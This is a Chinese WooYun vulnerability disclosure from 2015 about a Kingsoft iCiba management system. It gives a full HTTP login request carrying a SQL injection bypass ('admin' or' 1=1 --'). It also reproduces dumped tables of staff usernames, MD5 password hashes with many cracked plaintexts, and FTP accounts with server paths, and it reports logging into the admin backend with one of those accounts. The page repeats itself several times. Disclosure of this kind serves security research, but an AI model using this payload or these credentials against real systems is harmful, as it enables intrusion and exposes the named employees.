金山词霸某管理系统泄漏大量（tftp+ftp帐号30+已解密MD5进入管理后台）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141065

漏洞标题：金山词霸某管理系统泄漏大量（tftp+ftp帐号30+已解密MD5进入管理后台）

漏洞作者：牛小帅

提交时间：2015-09-14 14:38

修复时间：2015-10-29 14:54

公开时间：2015-10-29 14:54

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-14：细节已通知厂商并且等待厂商处理中
2015-09-14：厂商已经确认，细节仅向厂商公开
2015-09-24：细节向核心白帽子及相关领域专家公开
2015-10-04：细节向普通白帽子公开
2015-10-14：细节向实习白帽子公开
2015-10-29：细节向公众公开

简要描述：

详细说明：

注入延伸

POST /index.php?action=post.login HTTP/1.1
Host: mis.iciba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mis.iciba.com/index.php?action=login
Content-Length: 53
Cookie: _ustat=%7B%22i%22%3A0%2C%22n%22%3A%22guest%22%2C%22e%22%3Anull%2C%22s%22%3A%7B%22e%22%3Afalse%2C%22m%22%3Afalse%2C%22u%22%3Afalse%7D%2C%22sid%22%3A%221b7603fb2ce89bcd4a5cb1200d85c702%22%7D; iciba_u_rand=c73ac4038e3bbc191a187644a1363e55%40101.71.243.74; iciba_u_rand_t=1442201527; Hm_lvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201530,1442201607; Hm_lpvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201607; PHPSESSID=30oo98co8vr2gl8pjjtrfimob4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=admin' or' 1=1 --&password=admin' or' 1=1

泄漏大量tftp和ftp帐号，已经解密

------+------------------------------------------------+----------+------+------
--+---------------+
| email   | groupid | hash                             | lastlogin           | m
obile | password                                       | realname | tftp | useri
d | username      |
+---------+---------+----------------------------------+---------------------+--
------+------------------------------------------------+----------+------+------
--+---------------+
| NULL    | 1       | NULL                             | 2015-08-20 16:39:08 | 0
      | eb1e961e087cc34891781a5bb6bf6d4d               | NULL     | 0    | 40
  | chenhui1      |
| NULL    | 1       | NULL                             | 2014-08-08 09:21:32 | 0
      | 99022fa4f427861213785e567b77130f (chenzeqing)  | NULL     | 0    | 35
  | chenzeqing    |
| NULL    | 1       | NULL                             | 2015-08-25 10:13:39 | 0
      | e9ff91372402d9453acc1fd1e020d3de (liuzhongjie) | NULL     | 0    | 34
  | liuzhongjie   |
| NULL    | 1       | NULL                             | 2014-05-08 13:30:49 | 0
      | a4011069a80c1bb23626f9d96e63f35c (gaoqiang)    | NULL     | 1    | 32
  | gaoqiang      |
| NULL    | 1       | NULL                             | 2015-08-14 17:08:02 | 0
      | e10adc3949ba59abbe56e057f20f883e (123456)      | NULL     | 0    | 37
  | liuhuan1      |
| NULL    | 3       | NULL                             | 2015-08-24 21:22:55 | N
ULL   | f314f877e377f12d10e8f49de949ed75 (yangfeng3)   | NULL     | 0    | 38
  | yangfeng3     |
| NULL    | 1       | NULL                             | 2013-11-04 19:25:50 | 0
      | 8c69dea287bf25483062a2f4198f2815 (wangwenwu)   | NULL     | 0    | 24
  | wangwenwu     |
| NULL    | 3       | NULL                             | 2013-05-27 09:47:33 | N
ULL   | 22a780a3c1c4cc8a05f48fc31a8bd10b (jijunyi)     | NULL     | 0    | 22
  | jijunyi       |
| NULL    | 1       | NULL                             | 2012-09-28 09:25:54 | 0
      | e10adc3949ba59abbe56e057f20f883e (123456)      | NULL     | 1    | 18
  | fuwei         |
| NULL    | 3       | NULL                             | 2015-05-13 09:57:06 | N
ULL   | b3b297ee0728d31143315452d2c1abd6               | NULL     | 0    | 12
  | liushu        |
| NULL    | 3       | NULL                             | 2013-11-28 18:16:07 | N
ULL   | e10adc3949ba59abbe56e057f20f883e (123456)      | NULL     | 0    | 21
  | zhaohaifeng   |
| NULL    | 3       | NULL                             | 2015-08-03 10:02:03 | 0
      | 60b5a35b5f398fa4e56f2f4ec8dacd7e (duanjing)    | NULL     | 1    | 5
  | duanjing      |
| NULL    | 1       | NULL                             | 2015-09-14 11:30:35 | 0
      | e10adc3949ba59abbe56e057f20f883e (123456)      | NULL     | 0    | 39
  | wuyingbo      |
| NULL    | 1       | NULL                             | 2015-08-06 09:09:20 | 0
      | bf669772743e7592d856a8054716fe20               | NULL     | 0    | 36
  | zuochengli    |
| <blank> | 1       | 5ddf4332ba33189e29ac381f92844a0f | 2015-09-14 13:38:27 | 1
23456 | a9c5d68e918da87537b2710faa9e82e3               | <blank>  | 1    | 1
  | sunboyu1      |
| NULL    | 1       | 69efa3abb53f00231ce65c15f9f4da47 | 2014-06-30 18:16:27 | 0
      | 7cb3bb98353d2147e8cbb4c2860c82ab               | NULL     | 1    | 30
  | guoqin        |
| NULL    | 3       | 9669a1df9334fd67985a63edc0ccf8ec | 2015-09-14 09:29:25 | N
ULL   | fb555e44f59499569da31b8fdda24a2f               | NULL     | 0    | 29
  | huangqiaoxiao |
| NULL    | 3       | d101f60b0d6acb6d8378dc3be71168ea | 2015-09-14 09:08:35 | 0
      | d6de90ba2e8a7c56a0dd68ae0ea3770b               | <blank>  | 0    | 2
  | linsong       |
+---------+------------------------------+-------------+-----+----------+-------
--------------------------------------+------------+-----------+---------+-----+
-------------+------------+
| comment | Dir                          | DLBandwidth | Gid | ipaccess | Passwo
rd                                    | QuotaFiles | QuotaSize | status  | Uid |
 ULBandwidth | User       |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | a9c5d6
8e918da87537b2710faa9e82e3            | 0          | 0         | <blank> | 500 |
 0           | sunboyu1   |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | f83dad
5ca2f54453f144ffba72bbc2e3            | 0          | 0         | <blank> | 500 |
 0           | zhangwei   |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | 3c131e
7615ac9cec12ee08f2cb0cafa2            | 0          | 0         | <blank> | 500 |
 0           | wuyufang   |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | c378d8
2ea995296c778d049d789d0702            | 0          | 0         | <blank> | 500 |
 0           | tangqili   |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | e10adc
3949ba59abbe56e057f20f883e (123456)   | 0          | 0         | <blank> | 500 |
 0           | zouyang    |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | e10adc
3949ba59abbe56e057f20f883e (123456)   | 0          | 0         | <blank> | 500 |
 0           | fuwei      |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | e10adc
3949ba59abbe56e057f20f883e (123456)   | 0          | 0         | <blank> | 500 |
 0           | fanjiangbo |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | 60b5a3
5b5f398fa4e56f2f4ec8dacd7e (duanjing) | 0          | 0         | <blank> | 500 |
 0           | duanjing   |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | 103daf
33f40d42aa8adc533acdc6fb47            | 0          | 0         | <blank> | 500 |
 0           | lisu       |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | 7cb3bb
98353d2147e8cbb4c2860c82ab            | 0          | 0         | <blank> | 500 |
 0           | guoqin     |
| <blank> | /data/app/cdn.iciba.com/web  | 0           | 500 | *        | bc5fd4
32ca9496b7409851b6cd51728f            | 0          | 0         | <blank> | 500 |
 0           | gaoqiang   |
| <blank> | /data/app/wap.iciba.com/www/ | 0           | 500 | *        | aeee21
96774691e2f8b315eeeac64f03            | 0          | 0         | 0       | 500 |
 0           | duanjing1  |

漏洞证明：

注入延伸

POST /index.php?action=post.login HTTP/1.1 Host: mis.iciba.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://mis.iciba.com/index.php?action=login Content-Length: 53 Cookie: _ustat=%7B%22i%22%3A0%2C%22n%22%3A%22guest%22%2C%22e%22%3Anull%2C%22s%22%3A%7B%22e%22%3Afalse%2C%22m%22%3Afalse%2C%22u%22%3Afalse%7D%2C%22sid%22%3A%221b7603fb2ce89bcd4a5cb1200d85c702%22%7D; iciba_u_rand=c73ac4038e3bbc191a187644a1363e55%40101.71.243.74; iciba_u_rand_t=1442201527; Hm_lvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201530,1442201607; Hm_lpvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201607; PHPSESSID=30oo98co8vr2gl8pjjtrfimob4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache username=admin' or' 1=1 --&password=admin' or' 1=1

泄漏大量tftp和ftp帐号，已经解密

------+------------------------------------------------+----------+------+------ --+---------------+ | email | groupid | hash | lastlogin | m obile | password | realname | tftp | useri d | username | +---------+---------+----------------------------------+---------------------+-- ------+------------------------------------------------+----------+------+------ --+---------------+ | NULL | 1 | NULL | 2015-08-20 16:39:08 | 0 | eb1e961e087cc34891781a5bb6bf6d4d | NULL | 0 | 40 | chenhui1 | | NULL | 1 | NULL | 2014-08-08 09:21:32 | 0 | 99022fa4f427861213785e567b77130f (chenzeqing) | NULL | 0 | 35 | chenzeqing | | NULL | 1 | NULL | 2015-08-25 10:13:39 | 0 | e9ff91372402d9453acc1fd1e020d3de (liuzhongjie) | NULL | 0 | 34 | liuzhongjie | | NULL | 1 | NULL | 2014-05-08 13:30:49 | 0 | a4011069a80c1bb23626f9d96e63f35c (gaoqiang) | NULL | 1 | 32 | gaoqiang | | NULL | 1 | NULL | 2015-08-14 17:08:02 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 37 | liuhuan1 | | NULL | 3 | NULL | 2015-08-24 21:22:55 | N ULL | f314f877e377f12d10e8f49de949ed75 (yangfeng3) | NULL | 0 | 38 | yangfeng3 | | NULL | 1 | NULL | 2013-11-04 19:25:50 | 0 | 8c69dea287bf25483062a2f4198f2815 (wangwenwu) | NULL | 0 | 24 | wangwenwu | | NULL | 3 | NULL | 2013-05-27 09:47:33 | N ULL | 22a780a3c1c4cc8a05f48fc31a8bd10b (jijunyi) | NULL | 0 | 22 | jijunyi | | NULL | 1 | NULL | 2012-09-28 09:25:54 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 1 | 18 | fuwei | | NULL | 3 | NULL | 2015-05-13 09:57:06 | N ULL | b3b297ee0728d31143315452d2c1abd6 | NULL | 0 | 12 | liushu | | NULL | 3 | NULL | 2013-11-28 18:16:07 | N ULL | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 21 | zhaohaifeng | | NULL | 3 | NULL | 2015-08-03 10:02:03 | 0 | 60b5a35b5f398fa4e56f2f4ec8dacd7e (duanjing) | NULL | 1 | 5 | duanjing | | NULL | 1 | NULL | 2015-09-14 11:30:35 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 39 | wuyingbo | | NULL | 1 | NULL | 2015-08-06 09:09:20 | 0 | bf669772743e7592d856a8054716fe20 | NULL | 0 | 36 | zuochengli | | <blank> | 1 | 5ddf4332ba33189e29ac381f92844a0f | 2015-09-14 13:38:27 | 1 23456 | a9c5d68e918da87537b2710faa9e82e3 | <blank> | 1 | 1 | sunboyu1 | | NULL | 1 | 69efa3abb53f00231ce65c15f9f4da47 | 2014-06-30 18:16:27 | 0 | 7cb3bb98353d2147e8cbb4c2860c82ab | NULL | 1 | 30 | guoqin | | NULL | 3 | 9669a1df9334fd67985a63edc0ccf8ec | 2015-09-14 09:29:25 | N ULL | fb555e44f59499569da31b8fdda24a2f | NULL | 0 | 29 | huangqiaoxiao | | NULL | 3 | d101f60b0d6acb6d8378dc3be71168ea | 2015-09-14 09:08:35 | 0 | d6de90ba2e8a7c56a0dd68ae0ea3770b | <blank> | 0 | 2 | linsong | +---------+------------------------------+-------------+-----+----------+------- --------------------------------------+------------+-----------+---------+-----+ -------------+------------+ | comment | Dir | DLBandwidth | Gid | ipaccess | Passwo rd | QuotaFiles | QuotaSize | status | Uid | ULBandwidth | User | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | a9c5d6 8e918da87537b2710faa9e82e3 | 0 | 0 | <blank> | 500 | 0 | sunboyu1 | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | f83dad 5ca2f54453f144ffba72bbc2e3 | 0 | 0 | <blank> | 500 | 0 | zhangwei | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 3c131e 7615ac9cec12ee08f2cb0cafa2 | 0 | 0 | <blank> | 500 | 0 | wuyufang | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | c378d8 2ea995296c778d049d789d0702 | 0 | 0 | <blank> | 500 | 0 | tangqili | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc 3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | zouyang | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc 3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | fuwei | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc 3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | fanjiangbo | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 60b5a3 5b5f398fa4e56f2f4ec8dacd7e (duanjing) | 0 | 0 | <blank> | 500 | 0 | duanjing | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 103daf 33f40d42aa8adc533acdc6fb47 | 0 | 0 | <blank> | 500 | 0 | lisu | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 7cb3bb 98353d2147e8cbb4c2860c82ab | 0 | 0 | <blank> | 500 | 0 | guoqin | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | bc5fd4 32ca9496b7409851b6cd51728f | 0 | 0 | <blank> | 500 | 0 | gaoqiang | | <blank> | /data/app/wap.iciba.com/www/ | 0 | 500 | * | aeee21 96774691e2f8b315eeeac64f03 | 0 | 0 | 0 | 500 | 0 | duanjing1 |

随便选个
chenzeqing chenzeqing
登入MIS管理系统

$)K%Z}5TH7_M]4}C8V{4JTHN.jpg$

修复方案：

版权声明：转载请注明来源牛小帅@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-09-14 14:53

厂商回复：

感谢提交，马上跟进处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141065

漏洞标题：金山词霸某管理系统泄漏大量（tftp+ftp帐号30+已解密MD5进入管理后台）

相关厂商：金山词霸

漏洞作者：牛小帅

提交时间：2015-09-14 14:38

修复时间：2015-10-29 14:54

公开时间：2015-10-29 14:54

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源牛小帅@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141065

漏洞标题：金山词霸某管理系统泄漏大量（tftp+ftp帐号30+已解密MD5进入管理后台）

相关厂商：金山词霸

漏洞作者： 牛 小 帅

提交时间：2015-09-14 14:38

修复时间：2015-10-29 14:54

公开时间：2015-10-29 14:54

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141065"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 牛 小 帅@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：牛小帅

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源牛小帅@乌云